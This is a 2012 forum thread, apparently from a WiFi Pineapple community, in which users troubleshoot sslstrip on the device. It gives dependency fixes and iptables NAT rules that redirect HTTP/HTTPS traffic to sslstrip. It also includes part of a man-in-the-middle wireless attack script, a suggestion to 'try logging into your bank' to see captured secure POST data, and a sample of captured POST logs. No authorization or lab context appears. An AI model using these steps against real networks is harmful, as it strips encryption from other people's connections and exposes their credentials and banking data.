E1337Recon Posted May 4, 2012 Share Posted May 4, 2012 I flashed 2.0.0 and have managed to get everything reconfigured how I had before and have been trying to get sslstrip to work as it is supposed to work now. I installed sslstrip 0.7.1 from opkgmanager and got this error when I tried to run it from cl: Traceback (most recent call last): File "/usb/usr/bin/sslstrip", line 27, in <module> from twisted.web import http File "/usb/usr/lib/python2.7/site-packages/twisted/__init__.py", line 22, in <module> raise ImportError("you need zope.interface installed " ImportError: you need zope.interface installed (http://zope.org/Products/ZopeInterface/) As you can see it wants me to install zope-interface but I checked to see if I needed it and it is already installed on my pineapple. And also I'm not sure if it's giving me an error with twisted-web but I do have it installed. If anyone could help that would be great. Quote Link to comment Share on other sites More sharing options...
Vulture Posted May 4, 2012 Share Posted May 4, 2012 Just got back into town, I will give you instructions in just a few minutes. I am flashing 2.0.0 now since I am running a version that is slightly older. Quote Link to comment Share on other sites More sharing options...
Vulture Posted May 4, 2012 Share Posted May 4, 2012 Okay, make sure you installed sslstrip to USB through opkg to make sure all the dependencies are there. Then execute the following in shell: ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7 touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py Should work after that. Quote Link to comment Share on other sites More sharing options...
E1337Recon Posted May 4, 2012 Author Share Posted May 4, 2012 Thanks for the quick reply, I'll quickly run those and let you know how it goes. Quote Link to comment Share on other sites More sharing options...
E1337Recon Posted May 4, 2012 Author Share Posted May 4, 2012 Works like a charm Vulture, you're a real life saver. Now to have some fun and get this up and running. Quote Link to comment Share on other sites More sharing options...
Vulture Posted May 4, 2012 Share Posted May 4, 2012 I can confirm on 2.0.0 doing a fresh install of the firmware, installing all available modules, then opening the opkg module and installing "sslstrip". Then running sslstrip will produce the above error. To resolve the error execute: ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7 touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py This is just to get SSL strip to run, you still will need to execute the iptables command to redirect the traffic to sslstrip's port. Quote Link to comment Share on other sites More sharing options...
Vulture Posted May 4, 2012 Share Posted May 4, 2012 Works like a charm Vulture, you're a real life saver. Now to have some fun and get this up and running. Enjoy your pineapple :) Quote Link to comment Share on other sites More sharing options...
legion Posted May 4, 2012 Share Posted May 4, 2012 .... This is just to get SSL strip to run, you still will need to execute the iptables command to redirect the traffic to sslstrip's port. Will this work? iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 127.0.0.1:10000 iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 127.0.0.1:10000 Quote Link to comment Share on other sites More sharing options...
E1337Recon Posted May 5, 2012 Author Share Posted May 5, 2012 (edited) From what I've read this is the command to use for redirecting traffic to sslstrip. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 But from what I've tried so far I cannot get this to work. It is not stripping SSL from the connections and just in general not working. Edited May 5, 2012 by E1337Recon Quote Link to comment Share on other sites More sharing options...
legion Posted May 5, 2012 Share Posted May 5, 2012 (edited) From what I've read this is the command to use for redirecting traffic to sslstrip. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 But from what I've tried so far I cannot get this to work. It is not stripping SSL from the connections and just in general not working. That will only redirect HTTP traffic, not ssl traffic. Here's a piece of the script that I ran in BT for MITM wireless attacks: iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000 *EDIT* Here's the full script: http://pastebin.com/Dyh9C6EB Edited May 5, 2012 by legion Quote Link to comment Share on other sites More sharing options...
Vulture Posted May 5, 2012 Share Posted May 5, 2012 From what I've read this is the command to use for redirecting traffic to sslstrip. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 But from what I've tried so far I cannot get this to work. It is not stripping SSL from the connections and just in general not working. What command are you running for sslstrip? Just sslstrip without any switches? You will want to issue the iptables command above, then "sslstrip -w /usb/sslstrip.log" or something to that effect, you will see nothing on the console command for sslstrip it will all be contained in the log file. Then try logging into your bank, it works, you should see: "{DATE} {TIME} SECURE POST Data ({WEBSITE}):{DATA STREAM}" Quote Link to comment Share on other sites More sharing options...
legion Posted May 6, 2012 Share Posted May 6, 2012 (edited) What am I doing wrong? root@Pineapple:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 root@Pineapple:~# sslstrip -w sslstrip.log /usb/usr/lib/python2.6/site-packages/twisted/internet/_sslverify.py:4: DeprecationWarning: the md5 module is deprecated; use hashlib instead Traceback (most recent call last): File "/usb/usr/bin/sslstrip", line 30, in <module> from sslstrip.StrippingProxy import StrippingProxy ImportError: No module named sslstrip.StrippingProxy root@Pineapple:~# **EDIT** Got it running by executing: python /usb/sslstrip/sslstrip.py -a -k -f Edited May 6, 2012 by legion Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted May 6, 2012 Share Posted May 6, 2012 For those interested, I'm running a test phase for my sslstrip module. Quote Link to comment Share on other sites More sharing options...
abxy007 Posted June 5, 2012 Share Posted June 5, 2012 (edited) What command are you running for sslstrip? Just sslstrip without any switches? You will want to issue the iptables command above, then "sslstrip -w /usb/sslstrip.log" or something to that effect, you will see nothing on the console command for sslstrip it will all be contained in the log file. Then try logging into your bank, it works, you should see: "{DATE} {TIME} SECURE POST Data ({WEBSITE}):{DATA STREAM}" I AM RUNNING FIRMWARE 2.1.0....DO I NEED TO RUN THE COMMAND "sslstrip -w /usb/sslstrip.log" ALSO, WHEN DO I ADD THE IPTABLES COMMAND...BEFORE I START SSLSTRIP OR AFTER? Edited June 5, 2012 by abxy007 Quote Link to comment Share on other sites More sharing options...
PineDominator Posted June 5, 2012 Share Posted June 5, 2012 I AM RUNNING FIRMWARE 2.1.0....DO I NEED TO RUN THE COMMAND "sslstrip -w /usb/sslstrip.log" ALSO, WHEN DO I ADD THE IPTABLES COMMAND...BEFORE I START SSLSTRIP OR AFTER? the easy way would be to use Whistle Master's module sslstrip, it configures everything needed, other than installing sslstrip to the usb Quote Link to comment Share on other sites More sharing options...
abxy007 Posted June 5, 2012 Share Posted June 5, 2012 (edited) the easy way would be to use Whistle Master's module sslstrip, it configures everything needed, other than installing sslstrip to the usb thanks for the info let me get this right1 install sslstrip module to pineapple instead if usb 2 run module (forwards logs first) 3 issue iptables command crap 4 watch the magic does that sum it up in a nutshell? Edited June 5, 2012 by abxy007 Quote Link to comment Share on other sites More sharing options...
PineDominator Posted June 5, 2012 Share Posted June 5, 2012 (edited) thanks for the info let me get this right 1 install sslstrip module to pineapple instead if usb 2 run module (forwards logs first) 3 issue iptables command crap 4 watch the magic does that sum it up in a nutshell? ok here is what you do #1 set up your thumb drive according to the guide found here in these forums. #2 with ics working ssh in and issue opkg update opkg --dest usb install sslstrip #3 install Whistle Master's module sslstrip internal or usb #4 just run it within the module from now on Edited June 5, 2012 by petertfm Quote Link to comment Share on other sites More sharing options...
abxy007 Posted June 5, 2012 Share Posted June 5, 2012 ok here is what you do #1 set up your thumb drive according to the guide found here in these forums. #2 with ics working ssh in and issue opkg update opkg --dest usb install sslstrip #3 install Whistle Master's module sslstrip internal or usb #4 just run it within the module from now on thanks heres what i got 2012-06-05 10:42:23,853 POST Data (su.ff.avast.com): !xœsJLQJ-,M-.nts.google.com): goog-malware-shavar;a:70649-80675:s:76801-86262:mac goog-phish-shavar;a:210081-215756:s:98770-101489:mac goog-badbinurl-shavar;a:137-5514:s:61-4658:mac goog-csdwhite-sha256;a:1-23:s:1:mac goog-downloadwhite-digest256;a:1-27:s:1-3:mac 2012-06-05 12:27:50,055 POST Data (safebrowsing.clients.google.com): goog-malware-shavar;a:70656-80677:s:76801-86263:mac goog-phish-shavar;a:210081-215761:s:98770-101494:mac goog-badbinurl-shavar;a:137-5514:s:61-4658:mac goog-csdwhite-sha256;a:1-23:s:1:mac goog-downloadwhite-digest256;a:1-27:s:1-3:mac does this look right Quote Link to comment Share on other sites More sharing options...
PineDominator Posted June 6, 2012 Share Posted June 6, 2012 thanks heres what i got 2012-06-05 10:42:23,853 POST Data (su.ff.avast.com): !xœsJLQJ-,M-.nts.google.com): goog-malware-shavar;a:70649-80675:s:76801-86262:mac goog-phish-shavar;a:210081-215756:s:98770-101489:mac goog-badbinurl-shavar;a:137-5514:s:61-4658:mac goog-csdwhite-sha256;a:1-23:s:1:mac goog-downloadwhite-digest256;a:1-27:s:1-3:mac 2012-06-05 12:27:50,055 POST Data (safebrowsing.clients.google.com): goog-malware-shavar;a:70656-80677:s:76801-86263:mac goog-phish-shavar;a:210081-215761:s:98770-101494:mac goog-badbinurl-shavar;a:137-5514:s:61-4658:mac goog-csdwhite-sha256;a:1-23:s:1:mac goog-downloadwhite-digest256;a:1-27:s:1-3:mac does this look right you will have to ask this in the sslstrip module forum, I don't have a lot of experience with it Quote Link to comment Share on other sites More sharing options...
abxy007 Posted June 6, 2012 Share Posted June 6, 2012 you will have to ask this in the sslstrip module forum, I don't have a lot of experience with it what about the iptables stuff? Quote Link to comment Share on other sites More sharing options...
legion Posted June 6, 2012 Share Posted June 6, 2012 (edited) IPTables are modified as a part of the module. Edited June 6, 2012 by legion Quote Link to comment Share on other sites More sharing options...
legion Posted June 6, 2012 Share Posted June 6, 2012 If you want to learn more, download the zip file of the the module and look at the source code. It will really help you figure out what is going on versus just clicking a magic button. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.